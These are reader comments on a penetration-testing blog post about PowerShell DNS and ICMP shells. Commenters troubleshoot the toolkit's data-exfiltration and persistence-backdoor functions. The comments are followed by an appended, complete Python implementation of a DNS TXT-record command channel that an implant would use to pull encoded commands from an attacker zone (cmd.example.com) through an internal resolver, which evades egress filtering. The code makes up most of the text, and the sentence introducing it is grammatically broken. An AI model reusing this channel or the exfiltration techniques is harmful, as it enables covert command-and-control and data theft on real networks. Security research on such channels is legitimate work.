Comments on Lab of a Penetration Tester: Week of PowerShell Shells - Day 5 - DNS, ICMP Shells and Wrap up
Blog author: Nikhil SamratAshok Mittal (http://www.blogger.com/profile/02092541175521734123)

Anonymous, 2015-05-17 02:15 (+05:30):
Your DNS shell requires egress port 53 to be open to the outside, which in an average enterprise is usually *blocked* for all systems except DNS forwarders. The better option would be to use DNS-A and/or DNS-TXT requests/answers as a transport for evading egress rules. Could you comment on that please? Thanks

Nikhil SamratAshok Mittal, 2015-05-17 11:00 (+05:30):
Sure. When I wrote "While dnscat2 supports an indirect connection as well", I meant that you can use an internal DNS/forwarders as well. That holds true both for the shell and the DNS_TXT_Pwnage backdoor. I believe I have also mentioned the same in the video. Sorry if that was not clear at first.

Hope it helps.

Anonymous, 2015-05-19 17:45 (+05:30):
Can I hack a Facebook with this?

Anonymous, 2015-07-02 16:42 (+05:30):
Awesome work! I'm just having a couple of small issues with the scripts... Invoke-Decode doesn't seem to work for me; it says something about the string/script not being correctly encoded, but I can decode the same string/script with an external base64 decoder. Another issue is when I exfiltrate data with Do-Exfiltration: the gmail option throws an error, even though it's correctly set up in the security settings of gmail. The pastebin option works, but it only exfiltrates the first line of the output; I've tested this with Get-Information and several other Powerpreter functions. I also have problems with the persistence function of Powerpreter. It seems like it only checks the "CheckURL" page of pastebin once when it's run and once after reboot, not every 5 seconds.

Thanks for your great work!

Anonymous, 2015-07-02 16:45 (+05:30):
I forgot to mention that the "CheckURL" problem is there regardless of whether it finds the magicstring, stopstring or nothing at all.

Nikhil SamratAshok Mittal, 2015-07-02 17:37 (+05:30):
Thanks for reporting these. Since you are facing multiple issues, could you please raise issues at Nishang's Github repo? https://github.com/samratashok/nishang

Please make sure you include the errors you are receiving.

Anonymous, 2015-07-03 17:16 (+05:30):
Thank you for the quick response. I've raised an issue on your github about the Gmail Do-Exfiltration option. The persistence function and the problem with it not rechecking "CheckURL" do not give any errors. But the hit count on the pastebin "CheckURL" page just gets raised by one, once after I run the command and once after reboot of the machine, regardless of magicstring, stopstring or random data on the "CheckURL" page. This also shows in the lack of script/command execution of the "PayloadURL", which also doesn't get a higher hit count, even when the magicstring is there in "CheckURL". I tested the persistence function on a regular user, an elevated user account and SYSTEM, all with the same result. I have no idea where it goes wrong or if it's me using this the wrong way. The lack of errors made me not want to raise this issue on your github.

I really appreciate your great work with Nishang!
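The point in the exchange above about egress filtering, that a TXT-record channel does not need the implant to reach port 53 on the Internet because the query is handed to the organisation's own recursive resolver or forwarder, which is the only host with that egress hole, as an added example. This is illustrative Python written for this page, not code from the original post or from Nishang or dnscat2. It builds a raw TXT query with the recursion-desired bit set, parses the answer (including the name-compression pointer resolvers emit), and reassembles a base64-encoded command split across the 255-byte character-strings of one TXT record. A constructed response stands in for the attacker-controlled zone so the round trip runs offline; the zone name `cmd.example.com`, the resolver address `10.0.0.53` and the base64 framing are assumptions for illustration.

```python
"""TXT-record command channel via an internal resolver (illustrative, stdlib only)."""
import base64
import random
import socket
import struct

QTYPE_TXT, QCLASS_IN = 16, 1


def encode_command(cmd: str) -> bytes:
    """Attacker side: the command published as the TXT record's text (base64 here; an assumption)."""
    return base64.b64encode(cmd.encode("utf-8"))


def build_txt_query(name: str, txid: int) -> bytes:
    """Standard query, RD=1 so the internal resolver recurses/forwards on our behalf."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", QTYPE_TXT, QCLASS_IN)


def _read_name(msg: bytes, off: int):
    """Decode a possibly compressed name; returns (name, offset just past it in the wire stream)."""
    labels, jumped, end = [], False, off
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                       # compression pointer: follow it, but
            if not jumped:                          # the caller continues after the 2-byte pointer
                end = off + 2
            jumped, off = True, struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if ln == 0:
            if not jumped:
                end = off
            return ".".join(labels), end
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln


def parse_txt_response(msg: bytes, txid: int) -> list:
    """Return the concatenated character-strings of every TXT answer RR; raise on id mismatch/RCODE."""
    rid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if rid != txid:
        raise ValueError("transaction id mismatch (spoofed or stale reply)")
    if flags & 0x000F:
        raise ValueError(f"server returned RCODE {flags & 0xF}")
    off = 12
    for _ in range(qd):                             # skip the echoed question
        _, off = _read_name(msg, off)
        off += 4
    records = []
    for _ in range(an):
        _, off = _read_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        if rtype != QTYPE_TXT:
            continue
        i, parts = 0, []
        while i < len(rdata):                       # <length><chars> ... up to 255 bytes each
            parts.append(rdata[i + 1:i + 1 + rdata[i]])
            i += 1 + rdata[i]
        records.append(b"".join(parts))             # order within one RR is preserved
    return records


def decode_command(records: list) -> str:
    return base64.b64decode(b"".join(records)).decode("utf-8")


def build_txt_response(query: bytes, texts: list) -> bytes:
    """Constructed stand-in for the authoritative server's reply (one RR per text, c00c -> question name)."""
    txid = struct.unpack("!H", query[:2])[0]
    question = query[12:query.index(b"\x00", 12) + 1 + 4]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(texts), 0, 0)   # QR=1, RD=1, RA=1
    answers = b""
    for t in texts:
        rdata = b"".join(bytes([len(t[i:i + 255])]) + t[i:i + 255] for i in range(0, len(t), 255))
        answers += b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_TXT, QCLASS_IN, 60, len(rdata)) + rdata
    return header + question + answers


def fetch_command(name: str, resolver_ip: str, timeout: float = 3.0) -> str:
    """Live path: send to the *internal* resolver; only it needs outbound 53 (assumed address)."""
    txid = random.randrange(0, 65536)
    q = build_txt_query(name, txid)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(q, (resolver_ip, 53))
        data, _ = s.recvfrom(4096)
    return decode_command(parse_txt_response(data, txid))


if __name__ == "__main__":
    # Offline round trip with a constructed reply; replace with fetch_command("cmd.example.com", "10.0.0.53").
    q = build_txt_query("cmd.example.com", 0x1234)
    reply = build_txt_response(q, [encode_command("Get-Process | Select-Object -First 3")])
    print(decode_command(parse_txt_response(reply, 0x1234)))
```

The transaction-id check matters on the implant side because the reply arrives from whatever resolver answered, not from the attacker; a wrong id is dropped rather than executed. Multiple TXT records in one answer are not returned in a guaranteed order, so a payload longer than one record should carry a sequence prefix or, as here, stay inside the character-strings of a single record.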